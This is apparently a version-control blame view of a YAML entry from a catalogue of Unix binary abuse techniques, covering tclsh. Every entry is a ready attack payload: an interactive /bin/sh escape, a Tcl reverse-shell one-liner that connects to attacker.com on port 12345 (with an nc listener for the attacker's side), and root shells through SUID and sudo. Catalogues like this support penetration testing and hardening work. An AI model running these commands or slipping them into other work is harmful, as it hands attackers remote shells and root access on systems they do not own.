2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-07-04 20:26:52 +02:00
|
|
|
- code: |
|
|
|
|
tclsh
|
|
|
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
2018-05-23 09:06:50 +02:00
|
|
|
reverse-shell-non-interactive:
|
2018-07-04 20:26:52 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
|
|
|
suid-enabled:
|
|
|
|
- code: |
|
|
|
|
./tclsh
|
|
|
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
|
|
|
sudo-enabled:
|
|
|
|
- code: |
|
|
|
|
sudo tclsh
|
|
|
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|